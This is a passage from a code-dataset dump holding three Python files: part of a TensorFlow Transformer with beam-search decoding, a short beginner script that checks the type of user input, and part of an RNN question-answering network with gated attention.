self._layernorm_ffn(ffn_inputs)\n outputs = self._ffn(outputs, training)\n outputs = self._dropout_ffn(outputs, training=training) + ffn_inputs\n return outputs\n\n\nclass DecoderLayer(tf.keras.layers.Layer):\n \"\"\"The building block that makes the decoder stack of layers, consisting of a \n self-attention sublayer, cross-attention sublayer and a feed-forward sublayer.\n \"\"\"\n def __init__(self, hidden_size, num_heads, filter_size, dropout_rate):\n \"\"\"Constructor.\n\n Args:\n hidden_size: int scalar, the hidden size of continuous representation.\n num_heads: int scalar, num of attention heads.\n filter_size: int scalar, the depth of the intermediate dense layer of the\n feed-forward sublayer.\n dropout_rate: float scalar, dropout rate for the Dropout layers.\n \"\"\"\n super(DecoderLayer, self).__init__()\n self._hidden_size = hidden_size\n self._num_heads = num_heads\n self._filter_size = filter_size\n self._dropout_rate = dropout_rate\n\n self._mha_intra = Attention(hidden_size, num_heads, dropout_rate)\n self._layernorm_mha_intra = tf.keras.layers.LayerNormalization() \n self._dropout_mha_intra = tf.keras.layers.Dropout(dropout_rate)\n\n self._mha_inter = Attention(hidden_size, num_heads, dropout_rate)\n self._layernorm_mha_inter = tf.keras.layers.LayerNormalization() \n self._dropout_mha_inter = tf.keras.layers.Dropout(dropout_rate) \n\n self._ffn = FeedForwardNetwork(hidden_size, filter_size, dropout_rate)\n self._layernorm_ffn = tf.keras.layers.LayerNormalization()\n self._dropout_ffn = tf.keras.layers.Dropout(dropout_rate)\n\n def call(self, \n inputs, \n encoder_outputs, \n look_ahead_mask, \n padding_mask, \n training, \n cache=None):\n \"\"\"Computes the output of the decoder layer.\n\n Args:\n inputs: float tensor of shape [batch_size, tgt_seq_len, hidden_size], the\n input target sequences.\n encoder_outputs: float tensor of shape [batch_size, src_seq_len, \n hidden_size], the encoded source sequences to be used as reference.\n look_ahead_mask: float tensor of shape [1, 1, tgt_seq_len, tgt_seq_len], \n populated with either 0 (for tokens to keep) or 1 (for tokens to be \n masked). \n padding_mask: float tensor of shape [batch_size, 1, 1, src_seq_len], \n populated with either 0 (for tokens to keep) or 1 (for tokens to be \n masked). \n training: bool scalar, True if in training mode.\n cache: (Optional) dict with entries\n 'k': tensor of shape [batch_size * beam_width, seq_len, num_heads, \n size_per_head],\n 'v': tensor of shape [batch_size * beam_width, seq_len, num_heads, \n size_per_head],\n 'tgt_tgt_attention': tensor of shape [batch_size * beam_width, \n num_heads, tgt_seq_len, tgt_seq_len],\n 'tgt_src_attention': tensor of shape [batch_size * beam_width, \n num_heads, tgt_seq_len, src_seq_len].\n Must be provided in inference mode.\n\n Returns:\n outputs: float tensor of shape [batch_size, tgt_seq_len, hidden_size], the\n output target sequences.\n \"\"\"\n query = reference = self._layernorm_mha_intra(inputs)\n outputs = self._mha_intra(\n query, reference, look_ahead_mask, training, cache=cache)\n mha_inter_inputs = self._dropout_mha_intra(outputs, training=training\n ) + inputs\n\n query, reference = self._layernorm_mha_inter(mha_inter_inputs\n ), encoder_outputs\n outputs = self._mha_inter(\n query, reference, padding_mask, training, cache=cache)\n ffn_inputs = self._dropout_mha_inter(outputs, training=training\n ) + mha_inter_inputs\n\n outputs = self._layernorm_ffn(ffn_inputs)\n outputs = self._ffn(outputs, training)\n outputs = self._dropout_ffn(outputs, training=training) + ffn_inputs\n return outputs\n\n\nclass Encoder(tf.keras.layers.Layer):\n \"\"\"The Encoder that consists of a stack of structurally identical layers.\"\"\"\n def __init__(\n self, stack_size, hidden_size, num_heads, filter_size, dropout_rate):\n \"\"\"Constructor.\n\n Args:\n stack_size: int scalar, num of layers in the stack.\n hidden_size: int scalar, the hidden size of continuous representation.\n num_heads: int scalar, num of attention heads.\n filter_size: int scalar, the depth of the intermediate dense layer of the\n feed-forward sublayer. \n dropout_rate: float scalar, dropout rate for the Dropout layers. \n \"\"\"\n super(Encoder, self).__init__()\n self._stack_size = stack_size \n self._hidden_size = hidden_size\n self._num_heads = num_heads\n self._filter_size = filter_size\n self._dropout_rate = dropout_rate\n\n self._stack = [EncoderLayer(hidden_size, \n num_heads, \n filter_size, \n dropout_rate) for _ in range(self._stack_size)]\n self._layernorm = tf.keras.layers.LayerNormalization() \n\n def call(self, inputs, padding_mask, training):\n \"\"\"Computes the output of the encoder stack of layers. \n\n Args:\n inputs: float tensor of shape [batch_size, src_seq_len, hidden_size], the\n input source sequences.\n padding_mask: float tensor of shape [batch_size, 1, 1, src_seq_len], \n populated with either 0 (for tokens to keep) or 1 (for tokens to be \n masked). \n training: bool scalar, True if in training mode.\n\n Returns:\n outputs: float tensor of shape [batch_size, src_seq_len, hidden_size], the\n output source sequences.\n \"\"\"\n for layer in self._stack:\n inputs = layer.call(inputs, padding_mask, training)\n outputs = self._layernorm(inputs)\n return outputs\n\n\nclass Decoder(tf.keras.layers.Layer):\n \"\"\"Decoder that consists of a stack of structurally identical layers.\"\"\"\n def __init__(\n self, stack_size, hidden_size, num_heads, filter_size, dropout_rate):\n \"\"\"Constructor.\n\n Args:\n stack_size: int scalar, the num of layers in the stack.\n hidden_size: int scalar, the hidden size of continuous representation.\n num_heads: int scalar, num of attention heads.\n filter_size: int scalar, the depth of the intermediate dense layer of the\n feed-forward sublayer. \n dropout_rate: float scalar, dropout rate for the Dropout layers. \n \"\"\"\n super(Decoder, self).__init__()\n self._stack_size = stack_size \n self._hidden_size = hidden_size\n self._num_heads = num_heads\n self._filter_size = filter_size\n self._dropout_rate = dropout_rate\n\n self._stack = [DecoderLayer(\n hidden_size, num_heads, filter_size, dropout_rate) \n for _ in range(self._stack_size)]\n self._layernorm = tf.keras.layers.LayerNormalization() \n \n def call(self, \n inputs, \n encoder_outputs, \n look_ahead_mask, \n padding_mask, \n training, \n cache=None):\n \"\"\"Computes the output of the decoder stack of layers.\n\n Args:\n inputs: float tensor of shape [batch_size, tgt_seq_len, hidden_size], the\n input target sequences.\n encoder_outputs: float tensor of shape [batch_size, src_seq_len, \n hidden_size], the encoded source sequences to be used as reference.\n look_ahead_mask: float tensor of shape [1, 1, tgt_seq_len, tgt_seq_len], \n populated with either 0 (for tokens to keep) or 1 (for tokens to be \n masked). \n padding_mask: float tensor of shape [batch_size, 1, 1, src_seq_len], \n populated with either 0 (for tokens to keep) or 1 (for tokens to be \n masked). \n training: bool scalar, True if in training mode.\n cache: (Optional) dict with keys 'layer_0', ... \n 'layer_[self.num_layers - 1]', where the value\n associated with each key is a dict with entries\n 'k': tensor of shape [batch_size * beam_width, seq_len, num_heads, \n size_per_head],\n 'v': tensor of shape [batch_size * beam_width, seq_len, num_heads, \n size_per_head],\n 'tgt_tgt_attention': tensor of shape [batch_size * beam_width, \n num_heads, tgt_seq_len, tgt_seq_len],\n 'tgt_src_attention': tensor of shape [batch_size * beam_width, \n num_heads, tgt_seq_len, src_seq_len]. \n Must be provided in inference mode.\n\n Returns:\n outputs: float tensor of shape [batch_size, tgt_seq_len, hidden_size], the\n output target sequences.\n \"\"\"\n for i, layer in enumerate(self._stack):\n inputs = layer.call(inputs, \n encoder_outputs, \n look_ahead_mask, \n padding_mask, \n training, \n cache=cache['layer_%d' % i] \n if cache is not None else None)\n outputs = self._layernorm(inputs)\n return outputs\n\n\nclass TransformerModel(tf.keras.layers.Layer):\n \"\"\"Transformer model as described in https://arxiv.org/abs/1706.03762\n\n The model implements methods `call` and `transduce`, where\n - `call` is invoked in training mode, taking as input BOTH the source and \n target token ids, and returning the estimated logits for the target token \n ids.\n - `transduce` is invoked in inference mode, taking as input the source token \n ids ONLY, and outputting the token ids of the decoded target sequences \n using beam search. \n \"\"\"\n def __init__(self, \n vocab_size,\n encoder_stack_size=6, \n decoder_stack_size=6, \n hidden_size=512, \n num_heads=8, \n filter_size=2048, \n dropout_rate=0.1,\n extra_decode_length=50,\n beam_width=4,\n alpha=0.6):\n \"\"\"Constructor.\n\n Args:\n vocab_size: int scalar, num of subword tokens (including SOS/PAD and EOS) \n in the vocabulary. \n encoder_stack_size: int scalar, num of layers in encoder stack.\n decoder_stack_size: int scalar, num of layers in decoder stack.\n hidden_size: int scalar, the hidden size of continuous representation. \n num_heads: int scalar, num of attention heads.\n filter_size: int scalar, the depth of the intermediate dense layer of the\n feed-forward sublayer.\n dropout_rate: float scalar, dropout rate for the Dropout layers.\n extra_decode_length: int scalar, the max decode length would be the sum of\n `tgt_seq_len` and `extra_decode_length`.\n beam_width: int scalar, beam width for beam search.\n alpha: float scalar, the parameter for length normalization used in beam \n search.\n \"\"\"\n super(TransformerModel, self).__init__()\n self._vocab_size = vocab_size\n self._encoder_stack_size = encoder_stack_size\n self._decoder_stack_size = decoder_stack_size\n self._hidden_size = hidden_size\n self._num_heads = num_heads\n self._filter_size = filter_size\n self._dropout_rate = dropout_rate\n self._extra_decode_length = extra_decode_length\n self._beam_width = beam_width\n self._alpha = alpha\n\n self._embedding_logits_layer = EmbeddingLayer(vocab_size, hidden_size)\n self._encoder = Encoder(\n encoder_stack_size, hidden_size, num_heads, filter_size, dropout_rate)\n self._decoder = Decoder(\n decoder_stack_size, hidden_size, num_heads, filter_size, dropout_rate)\n\n self._encoder_dropout_layer = tf.keras.layers.Dropout(dropout_rate)\n self._decoder_dropout_layer = tf.keras.layers.Dropout(dropout_rate)\n\n def call(self, src_token_ids, tgt_token_ids):\n \"\"\"Takes as input the source and target token ids, and returns the estimated\n logits for the target sequences. Note this function should be called in \n training mode only.\n\n Args:\n src_token_ids: int tensor of shape [batch_size, src_seq_len], token ids\n of source sequences.\n tgt_token_ids: int tensor of shape [batch_size, tgt_seq_len], token ids \n of target sequences.\n\n Returns:\n logits: float tensor of shape [batch_size, tgt_seq_len, vocab_size]. \n \"\"\"\n padding_mask = utils.get_padding_mask(src_token_ids, SOS_ID)\n encoder_outputs = self._encode(src_token_ids, padding_mask, training=True)\n logits = self._decode(\n tgt_token_ids, encoder_outputs, padding_mask)\n return logits\n\n def _encode(self, src_token_ids, padding_mask, training=False):\n \"\"\"Converts source sequences token ids into continuous representation, and \n computes the Encoder-encoded sequences.\n\n Args:\n src_token_ids: int tensor of shape [batch_size, src_seq_len], token ids\n of source sequences.\n padding_mask: float tensor of shape [batch_size, 1, 1, src_seq_len], \n populated with either 0 (for tokens to keep) or 1 (for tokens to be \n masked). \n training: bool scalar, True if in training mode.\n\n Returns:\n encoder_outputs: float tensor of shape [batch_size, src_seq_len, \n hidden_size], the encoded source sequences to be used as reference. \n \"\"\"\n src_seq_len = tf.shape(src_token_ids)[1]\n\n # [batch_size, src_seq_len, hidden_size]\n src_token_embeddings = self._embedding_logits_layer(\n src_token_ids, 'embedding')\n\n # [src_seq_len, hidden_size]\n positional_encoding = utils.get_positional_encoding(\n src_seq_len, self._hidden_size)\n src_token_embeddings += positional_encoding\n src_token_embeddings = self._encoder_dropout_layer(\n src_token_embeddings, training)\n\n encoder_outputs = self._encoder(\n src_token_embeddings, padding_mask, training)\n return encoder_outputs\n\n def _decode(self, tgt_token_ids, encoder_outputs, padding_mask):\n \"\"\"Computes the estimated logits of target token ids, based on the encoded \n source sequences. Note this function should be called in training mode only.\n\n Args:\n tgt_token_ids: int tensor of shape [batch_size, tgt_seq_len] token ids of \n target sequences.\n encoder_outputs: float tensor of shape [batch_size, src_seq_len, \n hidden_size], the encoded source sequences to be used as reference. \n padding_mask: float tensor of shape [batch_size, 1, 1, src_seq_len], \n populated with either 0 (for tokens to keep) or 1 (for tokens to be \n masked). \n\n Returns:\n logits: float tensor of shape [batch_size, tgt_seq_len, vocab_size].\n \"\"\"\n tgt_seq_len = tf.shape(tgt_token_ids)[1]\n\n # [batch_size, tgt_seq_len, hidden_size]\n tgt_token_embeddings = self._embedding_logits_layer(\n tgt_token_ids, 'embedding')\n\n # [tgt_seq_len, hidden_size]\n positional_encoding = utils.get_positional_encoding(\n tgt_seq_len, self._hidden_size)\n tgt_token_embeddings += positional_encoding\n tgt_token_embeddings = self._decoder_dropout_layer(\n tgt_token_embeddings, training=True) \n\n look_ahead_mask = utils.get_look_ahead_mask(tgt_seq_len)\n\n # [batch_size, tgt_seq_len, hidden_size]\n decoder_outputs = self._decoder(tgt_token_embeddings, \n encoder_outputs, \n look_ahead_mask, \n padding_mask, \n training=True)\n\n # [batch_size, tgt_seq_len, vocab_size]\n logits = self._embedding_logits_layer(decoder_outputs, 'logits')\n return logits\n\n def transduce(self, src_token_ids):\n \"\"\"Takes as input the source token ids only, and outputs the token ids of \n the decoded target sequences using beam search. Note this function should be \n called in inference mode only.\n\n Args:\n src_token_ids: int tensor of shape [batch_size, src_seq_len], token ids\n of source sequences.\n\n Returns:\n decoded_ids: int tensor of shape [batch_size, decoded_seq_len], the token\n ids of the decoded target sequences using beam search.\n scores: float tensor of shape [batch_size], the scores (length-normalized \n log-probs) of the decoded target sequences.\n tgt_tgt_attention: a list of `decoder_stack_size` float tensor of shape \n [batch_size, num_heads, decoded_seq_len, decoded_seq_len], \n target-to-target attention weights.\n tgt_src_attention: a list of `decoder_stack_size` float tensor of shape \n [batch_size, num_heads, decoded_seq_len, src_seq_len], target-to-source \n attention weights.\n src_src_attention: a list of `encoder_stack_size` float tensor of shape \n [batch_size, num_heads, src_seq_len, src_seq_len], source-to-source \n attention weights.\n \"\"\"\n batch_size, src_seq_len = tf.unstack(tf.shape(src_token_ids))\n max_decode_length = src_seq_len + self._extra_decode_length\n decoding_fn = self._build_decoding_fn(max_decode_length)\n decoding_cache = self._build_decoding_cache(src_token_ids, batch_size)\n sos_ids = tf.ones([batch_size], dtype='int32') * SOS_ID\n\n bs = beam_search.BeamSearch(decoding_fn, \n self._embedding_logits_layer._vocab_size, \n batch_size,\n self._beam_width, \n self._alpha, \n max_decode_length, \n EOS_ID)\n\n decoded_ids, scores, decoding_cache = bs.search(sos_ids, decoding_cache)\n\n tgt_tgt_attention = [\n decoding_cache['layer_%d' % i]['tgt_tgt_attention'].numpy()[:, 0]\n for i in range(self._decoder_stack_size)]\n tgt_src_attention = [\n decoding_cache['layer_%d' % i]['tgt_src_attention'].numpy()[:, 0]\n for i in range(self._decoder_stack_size)]\n\n decoded_ids = decoded_ids[:, 0, 1:]\n scores = scores[:, 0] \n\n src_src_attention = [\n self._encoder._stack[i]._mha._attention_weights.numpy()\n for i in range(self._encoder._stack_size)]\n\n return (decoded_ids, scores, \n tgt_tgt_attention, tgt_src_attention, src_src_attention)\n\n def _build_decoding_cache(self, src_token_ids, batch_size):\n \"\"\"Builds a dictionary that caches previously computed key and value feature\n maps and attention weights of the growing decoded sequence.\n\n Args:\n src_token_ids: int tensor of shape [batch_size, src_seq_len], token ids of \n source sequences. \n batch_size: int scalar, num of sequences in a batch.\n\n Returns:\n decoding_cache: dict of entries\n 'encoder_outputs': tensor of shape [batch_size, src_seq_len, \n hidden_size],\n 'padding_mask': tensor of shape [batch_size, 1, 1, src_seq_len],\n\n and entries with keys 'layer_0',...,'layer_[decoder_num_layers - 1]'\n where the value associated with key 'layer_*' is a dict with entries\n 'k': tensor of shape [batch_size, 0, num_heads, size_per_head],\n 'v': tensor of shape [batch_size, 0, num_heads, size_per_head],\n 'tgt_tgt_attention': tensor of shape [batch_size, num_heads, \n 0, 0],\n 'tgt_src_attention': tensor of shape [batch_size, num_heads,\n 0, src_seq_len].\n \"\"\"\n padding_mask = utils.get_padding_mask(src_token_ids, SOS_ID)\n encoder_outputs = self._encode(src_token_ids, padding_mask, training=False)\n size_per_head = self._hidden_size // self._num_heads\n src_seq_len = padding_mask.shape[-1] \n\n decoding_cache = {'layer_%d' % layer:\n {'k':\n tf.zeros([\n batch_size, 0, self._num_heads, size_per_head\n ], 'float32'),\n 'v':\n tf.zeros([\n batch_size, 0, self._num_heads, size_per_head\n ], 'float32'),\n 'tgt_tgt_attention':\n tf.zeros([\n batch_size, self._num_heads, 0, 0], 'float32'), \n 'tgt_src_attention':\n tf.zeros([\n batch_size, self._num_heads, 0, src_seq_len], 'float32')\n\n } for layer in range(self._decoder._stack_size)\n }\n decoding_cache['encoder_outputs'] = encoder_outputs\n decoding_cache['padding_mask'] = padding_mask\n return decoding_cache\n\n def _build_decoding_fn(self, max_decode_length):\n \"\"\"Builds the decoding function that will be called in beam search.\n\n The function steps through the proposed token ids one at a time, and \n generates the logits of next token id over the vocabulary.\n\n Args:\n max_decode_length: int scalar, the decoded sequences would not exceed\n `max_decode_length`.\n\n Returns:\n decoding_fn: a callable that outputs the logits of the next decoded token\n ids.\n \"\"\"\n # [max_decode_length, hidden_size]\n timing_signal = utils.get_positional_encoding(\n max_decode_length, self._hidden_size)\n timing_signal = tf.cast(timing_signal, 'float32')\n\n def decoding_fn(decoder_input, cache, **kwargs):\n \"\"\"Computes the logits of the next decoded token ids.\n\n Args:\n decoder_input: int tensor of shape [batch_size * beam_width, 1], the \n decoded tokens at index `i`.\n cache: dict of entries\n 'encoder_outputs': tensor of shape \n [batch_size * beam_width, src_seq_len, hidden_size],\n 'padding_mask': tensor of shape\n [batch_size * beam_width, 1, 1, src_seq_len],\n\n and entries with keys 'layer_0',...,'layer_[decoder_num_layers - 1]'\n where the value associated with key 'layer_*' is a dict with entries\n 'k': tensor of shape [batch_size * beam_width, seq_len, num_heads, \n size_per_head],\n 'v': tensor of shape [batch_size * beam_width, seq_len, num_heads, \n size_per_head],\n 'tgt_tgt_attention': tensor of shape [batch_size * beam_width, \n num_heads, seq_len, seq_len],\n 'tgt_src_attention': tensor of shape [batch_size * beam_width, \n num_heads, seq_len, src_seq_len].\n Note `seq_len` is the running length of the growing decode sequence.\n kwargs: dict, storing the following additional keyword arguments.\n index -> int scalar tensor, the index of the `decoder_input` in the \n decoded sequence.\n\n Returns:\n logits: float tensor of shape [batch_size * beam_width, vocab_size].\n cache: a dict with the same structure as the input `cache`, except that\n the shapes of the values of key `k`, `v`, `tgt_tgt_attention`, \n `tgt_src_attention` are\n [batch_size * beam_width, seq_len + 1, num_heads, size_per_head],\n [batch_size * beam_width, seq_len + 1, num_heads, size_per_head],\n [batch_size * beam_width, num_heads, seq_len + 1, seq_len + 1],\n [batch_size * beam_width, num_heads, seq_len + 1, src_seq_len].\n \"\"\"\n index = kwargs['index']\n # [batch_size * beam_width, 1, hidden_size]\n decoder_input = self._embedding_logits_layer(decoder_input, 'embedding')\n decoder_input += timing_signal[index:index + 1]\n\n # [batch_size * beam_width, 1, hidden_size]\n decoder_outputs = self._decoder(decoder_input,\n cache['encoder_outputs'],\n tf.zeros((1, 1, 1, index + 1), \n dtype='float32'),\n cache['padding_mask'],\n training=False,\n cache=cache)\n\n # [[batch_size * beam_width, 1, vocab_size]\n logits = self._embedding_logits_layer(decoder_outputs, mode='logits')\n logits = tf.squeeze(logits, axis=1)\n return logits, cache\n\n return decoding_fn \n","repo_name":"chao-ji/tf-transformer","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":25878,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"13730221270","text":"varijabla = input(\"Upisi nesto: \")\nprint(\"Upisa ga ti za sve pare -\", varijabla)\n#print(type(varijabla))\n#tip = type(varijabla)\n\n\n\ntry:\n val = int(varijabla)\n print(\"Input is an integer number. Number = \", val)\nexcept ValueError:\n try:\n val = float(varijabla)\n print(\"Input is a float number. Number = \", val)\n except ValueError:\n print(\"No.. input is not a number. It's a string\")\n","repo_name":"mentalcic/lpthw","sub_path":"ex11_study_drill.py","file_name":"ex11_study_drill.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6534253487","text":"# -*- coding:utf-8 -*-\nimport tensorflow as tf\nimport os\n\n\nclass RNNQANet():\n def __init__(self, pretrained_embedding, encoder_units_number=[300, 100], attention_size=[100], hidden_rnn_size=[100], learning_rate=0.001, log_dir='./logs', model_path='./RNNQANet'):\n tf.reset_default_graph()\n self.question = tf.placeholder(shape=[None, None], dtype=tf.int32, name='question')\n self.context = tf.placeholder(shape=[None, None], dtype=tf.int32, name='context')\n self.y_start = tf.placeholder(shape=[None], dtype=tf.int32, name='y_start')\n self.y_end = tf.placeholder(shape=[None], dtype=tf.int32, name='y_end')\n self.dropout_keep_prob = tf.placeholder(dtype=tf.float32, shape=[], name='dropout_keep_prob')\n self.global_step = 0\n self.model_path=model_path\n with tf.variable_scope('embedding', initializer=tf.contrib.layers.xavier_initializer()):\n W = tf.Variable(pretrained_embedding, trainable=True, dtype=tf.float32, name='W_emb')\n self.question_input = tf.nn.embedding_lookup(ids=self.question, params=W)\n self.context_input = tf.nn.embedding_lookup(ids=self.context, params=W)\n \n with tf.variable_scope('context_encoder', initializer=tf.contrib.layers.xavier_initializer(uniform=True)) as scope:\n # Using Bidirectional RNN to encode context\n # u_c=BiRNN(e_c)\n fcell, bcell = self._biGRUs(encoder_units_number, activation=tf.nn.relu, keep_prob=self.dropout_keep_prob)\n self.context_output, self.c_state = tf.nn.bidirectional_dynamic_rnn(inputs=self.context_input, cell_fw=fcell, cell_bw=bcell, dtype=tf.float32, scope=scope)\n self.context_output = tf.concat(self.context_output, axis=-1)\n self.context_output = tf.contrib.layers.layer_norm(self.context_output)\n tf.summary.histogram('context_encoder', self.context_output)\n \n with tf.variable_scope('question_encoder', initializer=tf.contrib.layers.xavier_initializer(uniform=True)) as scope:\n # Using Bidirectional RNN to encode question\n # u_q=BiRNN(e_q)\n fcell, bcell = self._biGRUs(encoder_units_number, activation=tf.nn.relu, keep_prob=self.dropout_keep_prob)\n self.question_output, self.q_state = tf.nn.bidirectional_dynamic_rnn(inputs=self.question_input, cell_fw=fcell, cell_bw=bcell, dtype=tf.float32, scope=scope)\n self.question_output = tf.concat(self.question_output, axis=-1)\n self.question_output = tf.contrib.layers.layer_norm(self.question_output)\n tf.summary.histogram('question_encoder', self.question_output)\n \n with tf.variable_scope('co_attention', initializer=tf.contrib.layers.xavier_initializer(uniform=True)):\n # Co-attention: context -> question\n # a_cq=attn_biRNN(u_c,u_q)\n self.cq_att = self.gated_attention(self.context_output, self.question_output, hidden=attention_size, scope='cq_attention')\n cqfcell, cqbcell = self._biGRUs(hidden_rnn_size, activation=tf.nn.relu, keep_prob=self.dropout_keep_prob)\n self.cq_att, _ = tf.nn.bidirectional_dynamic_rnn(inputs=self.cq_att, cell_fw=cqfcell, cell_bw=cqbcell, dtype=tf.float32, scope=tf.get_variable_scope().name + '/cq_attention_rnn')\n self.cq_att = tf.concat(self.cq_att, axis=-1)\n self.cq_att = tf.contrib.layers.layer_norm(self.cq_att)\n tf.summary.histogram('cq_att', self.cq_att)\n \n # Co-attention: question -> context\n # a_qc=attn_biRNN(u_q,u_c)\n self.qc_att = self.gated_attention(self.question_output, self.context_output, hidden=attention_size, scope='qc_attention')\n qcfcell, qcbcell = self._biGRUs(hidden_rnn_size, activation=tf.nn.relu, keep_prob=self.dropout_keep_prob)\n self.qc_att, _ = tf.nn.bidirectional_dynamic_rnn(inputs=self.qc_att, cell_fw=qcfcell, cell_bw=qcbcell, dtype=tf.float32, scope=tf.get_variable_scope().name + '/qc_attention_rnn')\n self.qc_att = tf.concat(self.qc_att, axis=-1)\n self.qc_att = tf.contrib.layers.layer_norm(self.qc_att)\n tf.summary.histogram('qc_att', self.qc_att)\n \n with tf.variable_scope('self_attention', initializer=tf.contrib.layers.xavier_initializer(uniform=True)):\n # Self-attention: a_cq -> a_cq\n # a_cc=attn_biRNN(a_cq,a_cq)\n self.cc_att = self.gated_attention(self.cq_att, self.cq_att, hidden=attention_size, scope='cc_attention')\n ccfcell, ccbcell = self._biGRUs(hidden_rnn_size, activation=tf.nn.relu, keep_prob=self.dropout_keep_prob)\n self.cc_att, _ = tf.nn.bidirectional_dynamic_rnn(inputs=self.cc_att, cell_fw=ccfcell, cell_bw=ccbcell, dtype=tf.float32, scope=tf.get_variable_scope().name + '/cc_attention_rnn')\n self.cc_att = tf.concat(self.cc_att, axis=-1)\n self.cc_att = tf.contrib.layers.layer_norm(self.cc_att)\n tf.summary.histogram('cc_att', self.cc_att)\n \n # Self-attention: a_qc -> a_qc\n # a_qq=attn_biRNN(a_qc,a_qc)\n self.qq_att = self.gated_attention(self.qc_att, self.qc_att, hidden=attention_size, scope='qq_attention')\n qqfcell, qqbcell = self._biGRUs(hidden_rnn_size, activation=tf.nn.relu, keep_prob=self.dropout_keep_prob)\n self.qq_att, _ = tf.nn.bidirectional_dynamic_rnn(inputs=self.qq_att, cell_fw=qqfcell, cell_bw=qqbcell, dtype=tf.float32, scope=tf.get_variable_scope().name + '/qq_attention_rnn')\n self.qq_att = tf.concat(self.qq_att, axis=-1)\n self.qq_att = tf.contrib.layers.layer_norm(self.qq_att)\n tf.summary.histogram('qq_att', self.qq_att)\n \n with tf.variable_scope('output_layer', initializer=tf.contrib.layers.xavier_initializer(uniform=True)) as scope:\n # Output-attention: a_cq -> a_qc\n # a_o1,a_o2=attn_biRNN(a_cc,a_qq)\n output_att = self.gated_attention(self.cc_att, self.qq_att, hidden=attention_size, scope='output_attention')\n output_att = tf.concat([self.context_output, output_att], axis=-1)\n fcell, bcell = self._biGRUs(hidden_rnn_size, activation=tf.nn.relu, keep_prob=self.dropout_keep_prob)\n output, _ = tf.nn.bidirectional_dynamic_rnn(inputs=output_att, cell_fw=fcell, cell_bw=bcell, dtype=tf.float32, scope=scope)\n \n # use forward output to generate y1\n self.start_output = output[0]\n self.start_output = tf.contrib.layers.layer_norm(self.start_output)\n tf.summary.histogram('start_output', self.start_output)\n \n # use backward output to generate y2\n self.end_output = output[1]\n self.end_output = tf.contrib.layers.layer_norm(self.end_output)\n tf.summary.histogram('end_output', self.end_output)\n \n with tf.variable_scope('start_decoder', initializer=tf.contrib.layers.xavier_initializer(uniform=True)):\n # p_y1=RNN(a_o1)\n cell = [self._add_GRU(50, activation=tf.nn.relu), self._add_GRU(25, activation=tf.nn.relu), self._add_GRU(1, activation=tf.nn.relu)]\n cell = tf.contrib.rnn.MultiRNNCell(cells=cell, state_is_tuple=True)\n self.y_predict_start, _ = tf.nn.dynamic_rnn(cell=cell, inputs=self.start_output, dtype=tf.float32)\n self.y_predict_start = tf.unstack(self.y_predict_start, axis=-1)[0]\n tf.summary.histogram('y_predict_start', self.y_predict_start)\n self.y_predict_start_softmax = tf.nn.softmax(self.y_predict_start)\n self.y_predict_start_index = tf.argmax(self.y_predict_start_softmax, axis=1)\n self.y_start_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.y_predict_start, labels=self.y_start)\n tf.summary.scalar('start_loss', tf.reduce_mean(self.y_start_loss))\n \n with tf.variable_scope('end_decoder', initializer=tf.contrib.layers.xavier_initializer(uniform=True)):\n # p_y2=RNN(a_o2)\n cell = [self._add_GRU(50, activation=tf.nn.relu), self._add_GRU(25, activation=tf.nn.relu), self._add_GRU(1, activation=tf.nn.relu)]\n cell = tf.contrib.rnn.MultiRNNCell(cells=cell, state_is_tuple=True)\n self.y_predict_end, _ = tf.nn.dynamic_rnn(cell=cell, inputs=self.end_output, dtype=tf.float32)\n self.y_predict_end = tf.unstack(self.y_predict_end, axis=-1)[0]\n tf.summary.histogram('y_predict_end', self.y_predict_end)\n self.y_predict_end_softmax = tf.nn.softmax(self.y_predict_end)\n self.y_predict_end_index = tf.argmax(self.y_predict_end_softmax, axis=1)\n self.y_end_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.y_predict_end, labels=self.y_end)\n tf.summary.scalar('end_loss', tf.reduce_mean(self.y_end_loss))\n \n with tf.variable_scope('train'):\n self.optimizier = tf.train.AdamOptimizer(learning_rate=learning_rate)\n self.total_loss = tf.reduce_mean((self.y_start_loss + self.y_end_loss) / 2.0)\n tf.summary.scalar('total_loss', self.total_loss)\n self.train_op = self.optimizier.minimize(self.total_loss)\n self.init_op = tf.global_variables_initializer()\n self.merge_op = tf.summary.merge_all()\n self.session = tf.Session()\n self.session.run(self.init_op)\n self.saver = tf.train.Saver()\n self.writer = tf.summary.FileWriter(log_dir,graph=self.session.graph)\n \n def _add_dense_layer(self, inputs, output_shape, drop_keep_prob, act=tf.nn.tanh, use_bias=True):\n output = inputs\n for n in output_shape:\n output = tf.layers.dense(output, n, activation=act, use_bias=use_bias)\n output = tf.nn.dropout(output, drop_keep_prob)\n return output\n \n def gated_attention(self, inputs, memory, hidden, keep_prob=1.0, is_train=None, scope=\"dot_attention\", self_attention=False):\n with tf.variable_scope(scope):\n with tf.variable_scope(\"attention\"):\n # u=W1*u_i\n inputs_ = self._add_dense_layer(inputs, hidden, keep_prob, act=tf.nn.relu, use_bias=False)\n \n # v=W2*v_i\n memory_ = self._add_dense_layer(memory, hidden, keep_prob, act=tf.nn.relu, use_bias=False)\n \n # s=softmax(u*v)\n outputs = tf.matmul(inputs_, tf.transpose(memory_, [0, 2, 1]))\n logits = tf.nn.softmax(outputs)\n \n # l=s*v_i\n outputs = tf.matmul(logits, memory)\n \n # r=[u_i,l]\n result = tf.concat([inputs, outputs], axis=-1)\n with tf.variable_scope(\"gate\"):\n # g=\\sigma(W_g*r)\n gate = self._add_dense_layer(result, [result.shape[-1]], keep_prob, act=tf.nn.sigmoid, use_bias=False)\n # o=g*r\n return result * gate\n \n def _biGRUs(self, units_number, activation=tf.nn.relu, keep_prob=1.0):\n fcell = [self._add_GRU(units_number=n, keep_prob=keep_prob, activation=activation) for n in units_number]\n fcell = tf.contrib.rnn.MultiRNNCell(cells=fcell, state_is_tuple=True)\n bcell = [self._add_GRU(units_number=n, keep_prob=keep_prob, activation=activation) for n in units_number]\n bcell = tf.contrib.rnn.MultiRNNCell(cells=bcell, state_is_tuple=True)\n return fcell, bcell\n \n def _add_GRU(self, units_number, activation=tf.nn.tanh, keep_prob=1.0):\n cell = tf.contrib.rnn.GRUCell(units_number, activation=activation)\n cell = tf.contrib.rnn.DropoutWrapper(cell, 